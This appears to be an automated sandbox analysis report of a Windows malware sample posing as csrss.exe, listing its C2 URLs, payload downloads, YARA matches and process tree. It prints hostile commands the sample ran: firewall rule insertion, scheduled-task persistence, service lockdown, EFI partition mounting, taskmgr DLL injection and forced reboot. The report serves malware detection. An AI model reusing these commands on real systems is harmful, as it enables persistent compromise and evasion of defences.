            Source: csrss.exe, 00000008.00000003.412773581.00000000119EA000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460
            Source: csrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comc=177c2a906396ff21&uuid=server12.trumops.com:443server12.trumops.com:443
            Source: csrss.exe, 00000008.00000002.631848636.0000000011ADC000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comer:
            Source: csrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comserver12.trumops.com:443onserver12.trumops.com:443tcpserver12.trumops.co
            Source: csrss.exe, 00000008.00000002.631242583.00000000119D6000.00000004.00000001.sdmp, csrss.exe, 00000008.00000002.631592443.0000000011A86000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comserver12.trumops.com:443server12.trumops.com:443tcpserver12.trumops.com
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://sitescore.aiValue
            Source: csrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com
            Source: csrss.exeString found in binary or memory: https://trumops.com/api/install-failureinvalid
            Source: f6oNLRKHUy.exe, 00000001.00000002.362274050.0000000011850000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
            Source: csrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.com
            Source: f6oNLRKHUy.exe, 00000001.00000002.362513862.0000000011892000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
            Source: f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
            Source: f6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
            Source: csrss.exe, 00000010.00000002.392292944.0000000011814000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393573476.000000001180C000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408700688.00000000118CE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409398397.000000001180C000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.429012789.0000000011814000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
            Source: unknownHTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
            Source: unknownDNS traffic detected: queries for: trumops.com
            Source: global trafficHTTP traffic detected: GET /api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1Host: server12.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /0281c43f36eb9f47aab5357d48bbc076/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 8cf49c60-c834-48e4-bacd-9cc30e6a4460Version: 183Accept-Encoding: gzip
            Source: windefender.exe, 00000025.00000002.433836098.0000000000B0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            System Summary:

            barindex
            Uses shutdown.exe to shutdown or reboot the systemShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: f6oNLRKHUy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
            Source: 31.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9af2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9a76e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9a76e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9ad080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile created: C:\Windows\rssJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00927F034_2_00007FF6A00927F0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A795034_2_00007FF6A00A7950
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00BA17434_2_00007FF6A00BA174
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00941F034_2_00007FF6A00941F0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B8A4C34_2_00007FF6A00B8A4C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00AC25C34_2_00007FF6A00AC25C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A009337034_2_00007FF6A0093370
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B03B034_2_00007FF6A00B03B0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B5C1034_2_00007FF6A00B5C10
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B74FC34_2_00007FF6A00B74FC
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A854934_2_00007FF6A00A8549
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00AD55834_2_00007FF6A00AD558
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A483034_2_00007FF6A00A4830
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A804034_2_00007FF6A00A8040
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00AF07034_2_00007FF6A00AF070
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B286434_2_00007FF6A00B2864
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00A58EC34_2_00007FF6A00A58EC
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B48D834_2_00007FF6A00B48D8
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00AF90834_2_00007FF6A00AF908
            Source: bootmgfw.efi.8.drStatic PE information: No import functions for PE file found
            Source: bootx64.efi.8.drStatic PE information: No import functions for PE file found
            Source: EfiGuardDxe.efi.8.drStatic PE information: No import functions for PE file found
            Source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs f6oNLRKHUy.exe
            Source: C:\Windows\SysWOW64\sc.exeProcess token adjusted: Security
            Source: f6oNLRKHUy.exeMetadefender: Detection: 31%
            Source: f6oNLRKHUy.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile read: C:\Users\user\Desktop\f6oNLRKHUy.exeJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\f6oNLRKHUy.exe 'C:\Users\user\Desktop\f6oNLRKHUy.exe'
            Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Users\user\Desktop\f6oNLRKHUy.exe C:\Users\user\Desktop\f6oNLRKHUy.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\windefender.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: unknownProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'Jump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to behavior
